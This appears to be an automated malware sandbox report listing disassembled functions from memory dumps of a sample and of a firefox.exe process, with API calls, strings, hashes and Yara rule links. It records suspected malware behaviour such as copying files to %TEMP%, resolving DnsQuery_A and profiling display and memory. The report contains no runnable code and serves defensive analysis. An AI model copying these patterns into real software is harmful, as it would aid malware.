Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58

Function 00410E60 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58

Function 00410E68 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58

Function 00410BB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79

Strings

%TEMP%, xrefs: 00410C38
.tmp, xrefs: 00410C18

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58

Function 00410BB4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79

Strings

%TEMP%, xrefs: 00410C38
.tmp, xrefs: 00410C18

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58

Function 00417E78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

DnsQuery_A, xrefs: 00417EA7
dnsapi.dll, xrefs: 00417EAC

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: 7cb15cb3270dfea7a69dcce4b2cbc269a71cea9dcfa89aa6ef7ea401378252cb
Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
Opcode Fuzzy Hash: 7cb15cb3270dfea7a69dcce4b2cbc269a71cea9dcfa89aa6ef7ea401378252cb
Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58

Function 00417E7C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

DnsQuery_A, xrefs: 00417EA7
dnsapi.dll, xrefs: 00417EAC

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: 3cfbd1c39c90712b0f6f91fda7395d1ac3d24759ea385032c5fbcfaa3da3176a
Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
Opcode Fuzzy Hash: 3cfbd1c39c90712b0f6f91fda7395d1ac3d24759ea385032c5fbcfaa3da3176a
Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58

Function 00416644 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ,?), ref: 00416678
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0041667E

Strings

EnumDisplayDevicesW, xrefs: 0041666E
user32.dll, xrefs: 00416673

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: EnumDisplayDevicesW$user32.dll
API String ID: 2574300362-1693391355
Opcode ID: af34b5e80eadff1b2987b13dc2e651b6a133270980b26e7b502f8b40db48fb95
Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
Opcode Fuzzy Hash: af34b5e80eadff1b2987b13dc2e651b6a133270980b26e7b502f8b40db48fb95
Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58

Function 00417E80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

DnsQuery_A, xrefs: 00417EA7
dnsapi.dll, xrefs: 00417EAC

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: 1f81088a46c0324dda660dd481f614bad9869b2585b748a82db9a8fe1a613a36
Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
Opcode Fuzzy Hash: 1f81088a46c0324dda660dd481f614bad9869b2585b748a82db9a8fe1a613a36
Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58

Function 00401870 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E

Function 0040246C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517

Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Strings

^, xrefs: 00402496

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: ^
API String ID: 2227675388-551292248
Opcode ID: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
Opcode Fuzzy Hash: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C

Analysis Process: firefox.exePID: 8120, Parent PID: 2592COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	178
Total number of Limit Nodes:	20

Executed Functions

Function 06F1E820 Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 5f8d30cf8defd8ae07757e88379b178b7495281f3df9a3969e25d4b0f34a636d
Instruction ID: e7f4616bb748da80cf5021b57b0862e81eea7672b2d273187b0f24d561cc8bea
Opcode Fuzzy Hash: 5f8d30cf8defd8ae07757e88379b178b7495281f3df9a3969e25d4b0f34a636d
Instruction Fuzzy Hash: 80F13C30E00309CFDB54DFA9C948B9DBBF2BF88344F158559E809AF2A5DB74A945CB81

Function 00A6D3C9 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A6D456
GetCurrentThread.KERNEL32 ref: 00A6D493
GetCurrentProcess.KERNEL32 ref: 00A6D4D0
GetCurrentThreadId.KERNEL32 ref: 00A6D529

Memory Dump Source

Source File: 0000000B.00000002.2532858551.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_firefox.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0be63a998f2fa6b1c56614d5cdd90cf97ba34c6ee7ec00989dd5733595161283
Instruction ID: faff0900ff0727aee619daed870de29341f60737ebbe9145d79c38d9eace23fe
Opcode Fuzzy Hash: 0be63a998f2fa6b1c56614d5cdd90cf97ba34c6ee7ec00989dd5733595161283
Instruction Fuzzy Hash: 125158B0E002499FDB54DFAAD548BAEBBF1EF88304F20C459E409A7351DB746948CF65

Function 00A6D3D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A6D456
GetCurrentThread.KERNEL32 ref: 00A6D493
GetCurrentProcess.KERNEL32 ref: 00A6D4D0
GetCurrentThreadId.KERNEL32 ref: 00A6D529

Memory Dump Source

Source File: 0000000B.00000002.2532858551.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_firefox.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 77964d169c12c34c0b21df83f0ae2f3664ff8b927d37d8fb4097740e9c8be559
Instruction ID: c60bc58677cbbe112d8827b2adef274baf11cb0bea94859c8df105d60a422b70
Opcode Fuzzy Hash: 77964d169c12c34c0b21df83f0ae2f3664ff8b927d37d8fb4097740e9c8be559
Instruction Fuzzy Hash: 4C5138B0E002099FDB54DFAAD548B9EBBF1EF88304F20C459E419A7250DB746944CF65

Function 00A6AD48 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00A6AF9E

Memory Dump Source

Source File: 0000000B.00000002.2532858551.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_firefox.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bec503e603312523b72c8810196f2ca9fce2bba6b8e96bbfceb35ba59eaf730b
Instruction ID: eb5776f9921809b746b25ef12055712bb676252dc71a92b9730ff5597fc3ba35
Opcode Fuzzy Hash: bec503e603312523b72c8810196f2ca9fce2bba6b8e96bbfceb35ba59eaf730b
Instruction Fuzzy Hash: A98132B0A00B058FD724DF29D54575ABBF1FF88304F108A29E48AABA50D775E949CF92

Function 00A6590D Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00A659C9

Memory Dump Source

Source File: 0000000B.00000002.2532858551.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_firefox.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6c2aba28e7f98514a23179ecf52b868fafe1be0d2d333edbd62b7da14979d6ff
Instruction ID: b8e71bc6ceb441137c2c501adf4d75bc8bb816b865fe8df414b2f9ad3e674262
Opcode Fuzzy Hash: 6c2aba28e7f98514a23179ecf52b868fafe1be0d2d333edbd62b7da14979d6ff
Instruction Fuzzy Hash: 4B41F2B1C0061DCBDB24CFA9C888BDEBBB5FF49304F20816AD449AB255DB756946CF90

Function 00A64248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00A659C9

Memory Dump Source

Source File: 0000000B.00000002.2532858551.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_firefox.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1a376591841882db2627e54528b0ae914890e0749b7437ea20f6396830a8a28a
Instruction ID: a35b90cb1dd1614419d4b0c46b24b1672fd2ac5a508d30cec6ff355550030d80
Opcode Fuzzy Hash: 1a376591841882db2627e54528b0ae914890e0749b7437ea20f6396830a8a28a
Instruction Fuzzy Hash: DF41F2B1C0071DCBDB24CFA9C888B9EBBB6FF48304F20816AD409AB255DB756945CF90

Function 06F13B88 Relevance: 1.6, APIs: 1, Instructions: 74
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageW.USER32(?,?,?,?), ref: 06F13C3D

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6aad6b81a1ea2e7d090ba3d9843ddf9b2da4dd72e65de3f57b1d2f404f3f51ff
Instruction ID: ef59ce352a5c52eb5e44174079413b125c1e24e7d204b20e44830652f719f185
Opcode Fuzzy Hash: 6aad6b81a1ea2e7d090ba3d9843ddf9b2da4dd72e65de3f57b1d2f404f3f51ff
Instruction Fuzzy Hash: A12157B6A003589FCB14DFA9D544B9EBBF4FF48320F20845AE559AB350C771A944CFA0

Function 00A6D619 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A6D6A7

Memory Dump Source

Source File: 0000000B.00000002.2532858551.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_firefox.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8847bb6706449d8afe2bf6592fc343cca8736345cd9c3847be10e8341dbf5912
Instruction ID: 973ccb627916d6bd18125e0e86f1397599882dc1c9119aaf441d9cdff0e0fc27
Opcode Fuzzy Hash: 8847bb6706449d8afe2bf6592fc343cca8736345cd9c3847be10e8341dbf5912
Instruction Fuzzy Hash: DD2103B5D002489FDB10CFAAD984AEEBFF4EB48310F24801AE858A3310C375A945CF60

Function 00A6D620 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A6D6A7

Memory Dump Source

Source File: 0000000B.00000002.2532858551.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_firefox.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7840c24030c916dce98e57e38e1a4e3e209a2d0fe4eb1e13695d1e0aa811f38b
Instruction ID: f46c0992e86231c474013a09e5c42330d5b6b4bfeea6bb2269f0038f1a286009
Opcode Fuzzy Hash: 7840c24030c916dce98e57e38e1a4e3e209a2d0fe4eb1e13695d1e0aa811f38b
Instruction Fuzzy Hash: 7821C2B5D00248AFDB10CFAAD984ADEFBF8EB48310F14841AE919A7350D375A954CFA5

Function 06F119E0 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowTextW.USER32(?,00000000), ref: 06F11A4A

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 2b829222121073b2c5b306355505caba1e3f056801e2bd62485c2ba517bfe309
Instruction ID: 975311f01850f07d36fe68aa446522bfc919a1d9a4a266489c0f0fa5d9312fe8
Opcode Fuzzy Hash: 2b829222121073b2c5b306355505caba1e3f056801e2bd62485c2ba517bfe309
Instruction Fuzzy Hash: 361114B6C002098FDB10CF9AC944BDEFBF4EB88310F14842AE859A7240D338A549CFA5

Function 06F119DA Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowTextW.USER32(?,00000000), ref: 06F11A4A

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: c0b1dc66103bdfb4db01651d4bb7c1318499cb6e7361e1f7fc81d72e8e6cdd97
Instruction ID: f468bd310b4199b4a01b1d3954da42da20a61c40ef937ec85e8c6338fb2e24eb
Opcode Fuzzy Hash: c0b1dc66103bdfb4db01651d4bb7c1318499cb6e7361e1f7fc81d72e8e6cdd97
Instruction Fuzzy Hash: 7F1103B6D002098FDB14CF9AD5447EEFBF1AB88320F14842AD869B7650D338A549CFA5

Function 06F15720 Relevance: 1.5, APIs: 1, Instructions: 48
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 06F1577D

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2d9912d17e7cbf7ee597a4dcc65ad8dab95823e69e5a722a7950ceb113a62ea5
Instruction ID: a47640f252608012336bf3526bcfa78800392fd33766c7a9538ef93dbf91ce3a
Opcode Fuzzy Hash: 2d9912d17e7cbf7ee597a4dcc65ad8dab95823e69e5a722a7950ceb113a62ea5
Instruction Fuzzy Hash: A11136B5800309DFDB10CF9AC945BEEFBF8EB48320F10841AE918A3240D378A544CFA1

Function 06F10514 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 06F1201D

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 23ce21fe8c880fecd040121f3bc2dad9d72238ab4189552239863405d2fc0a61
Instruction ID: f3b79d9d7eacfebfdafec1c0ebb9107883fbe21fa8611bfb7e6bdad070ba58df
Opcode Fuzzy Hash: 23ce21fe8c880fecd040121f3bc2dad9d72238ab4189552239863405d2fc0a61
Instruction Fuzzy Hash: 161106B58003489FDB50DF99D989BDEFBF8EB48310F108419E519A7300C375A984CFA1

Function 00A6AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00A6AF9E

Memory Dump Source

Source File: 0000000B.00000002.2532858551.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_firefox.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 697b56707f841c9f710bf4ebf5ecd4382c80d6fff9455792a216cab411fc6818
Instruction ID: 3b43e2076e507e8978b92a28cec856d8073b2df9b2be0e145cf28559c9008e63
Opcode Fuzzy Hash: 697b56707f841c9f710bf4ebf5ecd4382c80d6fff9455792a216cab411fc6818
Instruction Fuzzy Hash: C211E0B6C002498FCB10DF9AD544BDEFBF4EB88314F10841AD819B7210D379A545CFA2

Function 06F11FBB Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 06F1201D

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd244c60beaa6c60b39a0cf15442763cd788acecbc79fa09daa721d6a98f7ae2
Instruction ID: a2e1e2906aefbb92548e094a70c960b43bd1537b8c03e51331c71134c0273510
Opcode Fuzzy Hash: bd244c60beaa6c60b39a0cf15442763cd788acecbc79fa09daa721d6a98f7ae2
Instruction Fuzzy Hash: FC1103B58003499FDB10DF99D985BDEFBF4EB48360F208419E518A7200D375AA84CFA1

Function 06F1E470 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06F1EB47), ref: 06F1F5E5

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 375f6b7ffeceaf47d374c575c5080aa18417be1cc937ef26ea7c84231b48f51c
Instruction ID: 7a28404bd6f03503d97561fd19275c477dbd5c8a172179fb43a4a764ac5af1a4
Opcode Fuzzy Hash: 375f6b7ffeceaf47d374c575c5080aa18417be1cc937ef26ea7c84231b48f51c
Instruction Fuzzy Hash: 5511FEB1C046499FCB60DF9AD948B9EFBF4EB48320F10846AE419B7300D379A544CFA5

Function 06F159D8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06F170BD

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 77babcb5dd191f7b4d1a8e2aa50198d3ad3e53afbc95dcd1b3410ec74f42e3af
Instruction ID: 7923a52555f1053e0246cf26b07fcc430f1a7f21b22303c74c84fd5750c6bfd1
